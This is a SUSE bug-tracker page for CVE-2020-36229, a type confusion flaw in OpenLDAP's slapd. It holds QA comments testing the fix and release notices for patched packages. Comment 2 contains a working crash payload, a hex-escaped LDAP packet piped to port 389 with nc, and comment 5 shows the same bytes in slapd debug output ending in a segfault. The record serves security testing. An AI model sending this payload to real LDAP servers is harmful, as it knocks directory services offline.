Bug 1182411 - (CVE-2020-36229) VUL-0: CVE-2020-36229: openldap2: Type confusion in ad_keystring in ad.c
(CVE-2020-36229)
VUL-0: CVE-2020-36229: openldap2: Type confusion in ad_keystring in ad.c
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Major
: ---
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/276465/
CVSSv3.1:SUSE:CVE-2020-36229:7.5:(AV:...
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2021-02-18 09:40 UTC by Alexander Bergmann
Modified: 2021-08-16 11:27 UTC (History)
3 users (show)

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Comment 2 jun wang 2021-03-02 13:32:56 UTC
I am testing openldap2 update SUSE:Maintenance:18481:236954, and and following the link https://bugs.openldap.org/show_bug.cgi?id=9425#c0, I ran the command BEFORE and AFTER, I got the same failed slapd service:

# echo -en '\x30\x82\x01\xe4\x02\x04\x30\x30\x30\x30\x4a\x82\x01\x30\x4f\x3d\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xa7\xb2\xef\xbe\xb2\xef\xb6\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\xef\xbe\xb2\x2c\x0a\x0a\x0a\x32\x2e\x35\x2e\x34\x2e\x33\x39\x3d\x30\x6b\x30\x30\x30\x06\x30\x30\x30\x30\x30\x30\x30\x06\x31\x7f\x30\x7f\x06\x06\x18\x18\x30\x30\x30\x30\x30\x31\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x38\x2e\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x06\x03\x30\x30\x30\x30\x03\x30\x30\x30\x30\x30\x06\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x03\x03\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30' | nc localhost 389

# systemctl status slapd.service 
● slapd.service - OpenLDAP Server Daemon
   Loaded: loaded (/usr/lib/systemd/system/slapd.service; disabled; vendor preset: disabled)
   Active: failed (Result: signal) since Tue 2021-03-02 21:32:10 CST; 1s ago
  Process: 31999 ExecStart=/usr/lib/openldap/start (code=exited, status=0/SUCCESS)
 Main PID: 32013 (code=killed, signal=SEGV)

Mar 02 21:32:00 linux-zeaz slapd[31999]: looking for plugins in '/usr/lib64/sasl2', failed to open directory, er>
Mar 02 21:32:00 linux-zeaz slapd[31999]: @(#) $OpenLDAP: slapd 2.4.46 $
                                                 opensuse-buildservice@opensuse.org
Mar 02 21:32:05 linux-zeaz slapd[31999]: looking for plugins in '/usr/lib64/sasl2', failed to open directory, er>
Mar 02 21:32:05 linux-zeaz slapd[32013]: slapd starting
Mar 02 21:32:05 linux-zeaz start[31999]: Starting ldap-server
Mar 02 21:32:05 linux-zeaz systemd[1]: Started OpenLDAP Server Daemon.
Mar 02 21:32:10 linux-zeaz slapd[32013]: conn=1000 fd=11 ACCEPT from IP=[::1]:39890 (IP=[::]:389)
Mar 02 21:32:10 linux-zeaz systemd[1]: slapd.service: Main process exited, code=killed, status=11/SEGV
Mar 02 21:32:10 linux-zeaz systemd[1]: slapd.service: Unit entered failed state.
Mar 02 21:32:10 linux-zeaz systemd[1]: slapd.service: Failed with result 'signal'.

is this expected ? this is a security update, I understand it a little hard.
Comment 3 Swamp Workflow Management 2021-03-03 20:19:00 UTC
SUSE-SU-2021:0693-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE OpenStack Cloud Crowbar 9 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud Crowbar 8 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud 9 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud 8 (src):    openldap2-2.4.41-18.83.1
SUSE OpenStack Cloud 7 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP5 (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP4-LTSS (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP3-LTSS (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP3-BCL (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP2-LTSS (src):    openldap2-2.4.41-18.83.1
SUSE Linux Enterprise Server 12-SP2-BCL (src):    openldap2-2.4.41-18.83.1
HPE Helion Openstack 8 (src):    openldap2-2.4.41-18.83.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 4 Swamp Workflow Management 2021-03-03 20:23:38 UTC
SUSE-SU-2021:0692-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP5 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Server for SAP 12-SP3 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Server for SAP 12-SP2 (src):    openldap2-2.4.41-39.1
SUSE Linux Enterprise Module for Legacy Software 12 (src):    openldap2-2.4.41-39.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 5 jun wang 2021-03-04 07:08:42 UTC
I simply debuged this bug after update, and got the output:

# /usr/lib/openldap/start
...
Starting ldap-server+ exec /usr/sbin/slapd -d 3 -h 'ldap:///  ldapi:///' -f /etc/openldap/slapd.conf -u ldap -g ldap -o slp=off
...
604086a5 slap_listener_activate(8): 
604086a5 >>> slap_listener(ldap:///)
604086a5 connection_get(13): got connid=1000
604086a5 connection_read(13): checking for input on id=1000
ber_get_next
ldap_read: want=8, got=8
  0000:  30 82 01 e4 02 04 30 30                            0.....00          
ldap_read: want=480, got=480
  0000:  30 30 4a 82 01 30 4f 3d  ef be b2 ef be b2 ef be   00J..0O=........  
  0010:  b2 ef be b2 ef be b2 ef  be b2 ef a7 b2 ef be b2   ................  
  0020:  ef b6 b2 ef be b2 ef be  b2 ef be b2 ef be b2 ef   ................  
  0030:  be b2 ef be b2 ef be b2  2c 0a 0a 0a 32 2e 35 2e   ........,...2.5.  
  0040:  34 2e 33 39 3d 30 6b 30  30 30 06 30 30 30 30 30   4.39=0k000.00000  
  0050:  30 30 06 31 7f 30 7f 06  06 18 18 30 30 30 30 30   00.1.0.....00000  
  0060:  31 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   1000000000000000  
  0070:  30 30 30 30 38 2e 30 30  30 30 30 30 30 30 30 30   00008.0000000000  
  0080:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0090:  30 30 30 30 06 03 30 30  30 30 03 30 30 30 30 30   0000..0000.00000  
  00a0:  06 30 30 30 30 30 30 30  30 30 30 30 30 03 03 30   .000000000000..0  
  00b0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  00c0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  00d0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  00e0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  00f0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0100:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0110:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0120:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0130:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0140:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0150:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0160:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0170:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0180:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  0190:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  01a0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  01b0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  01c0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
  01d0:  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30   0000000000000000  
ber_get_next: tag 0x30 len 484 contents:
604086a5 op tag 0x4a, time 1614841509
ber_get_next
ldap_read: want=8 error=Resource temporarily unavailable
604086a5 conn=1000 op=0 do_delete
ber_scanf fmt (m) ber:
604086a5 <= get_ctrls: n=0 rc=0 err=""
604086a5 >>> dnPrettyNormal: <O=ᄇᄇᄇᄇᄇᄇ鱗ᄇﶲᄇᄇᄇᄇᄇᄇᄇ,


2.5.4.39=0k00000000001000000100000000000000000008.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000>
Segmentation fault

Does this mean that this bug is not fixed ?
Comment 6 jun wang 2021-03-04 07:09:52 UTC
sorry, the debug from the above comment happened on SLES15SP1.
Comment 7 Swamp Workflow Management 2021-03-08 20:20:07 UTC
SUSE-SU-2021:0723-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE Manager Server 4.0 (src):    openldap2-2.4.46-9.48.1
SUSE Manager Retail Branch Server 4.0 (src):    openldap2-2.4.46-9.48.1
SUSE Manager Proxy 4.0 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server for SAP 15-SP1 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server for SAP 15 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server 15-SP1-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server 15-SP1-BCL (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Server 15-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Legacy Software 15-SP2 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Development Tools 15-SP3 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Development Tools 15-SP2 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise Module for Basesystem 15-SP2 (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-SP1-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-LTSS (src):    openldap2-2.4.46-9.48.1
SUSE Linux Enterprise High Performance Computing 15-ESPOS (src):    openldap2-2.4.46-9.48.1
SUSE Enterprise Storage 6 (src):    openldap2-2.4.46-9.48.1
SUSE CaaS Platform 4.0 (src):    openldap2-2.4.46-9.48.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 8 Swamp Workflow Management 2021-03-14 17:33:42 UTC
openSUSE-SU-2021:0408-1: An update that fixes 11 vulnerabilities is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
openSUSE Leap 15.2 (src):    openldap2-2.4.46-lp152.14.18.1
Comment 12 Swamp Workflow Management 2021-04-16 13:16:20 UTC
SUSE-SU-2021:14700-1: An update that solves 11 vulnerabilities and has one errata is now available.

Category: security (important)
Bug References: 1182279,1182408,1182411,1182412,1182413,1182415,1182416,1182417,1182418,1182419,1182420,1184020
CVE References: CVE-2020-36221,CVE-2020-36222,CVE-2020-36223,CVE-2020-36224,CVE-2020-36225,CVE-2020-36226,CVE-2020-36227,CVE-2020-36228,CVE-2020-36229,CVE-2020-36230,CVE-2021-27212
JIRA References: 
Sources used:
SUSE Linux Enterprise Server 11-SP4-LTSS (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1
SUSE Linux Enterprise Server 11-SECURITY (src):    openldap2-client-openssl1-2.4.26-0.74.26.1
SUSE Linux Enterprise Point of Sale 11-SP3 (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1
SUSE Linux Enterprise Debuginfo 11-SP3 (src):    openldap2-2.4.26-0.74.26.1, openldap2-client-2.4.26-0.74.26.1, openldap2-client-openssl1-2.4.26-0.74.26.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 13 Marcus Meissner 2021-08-16 11:27:00 UTC
released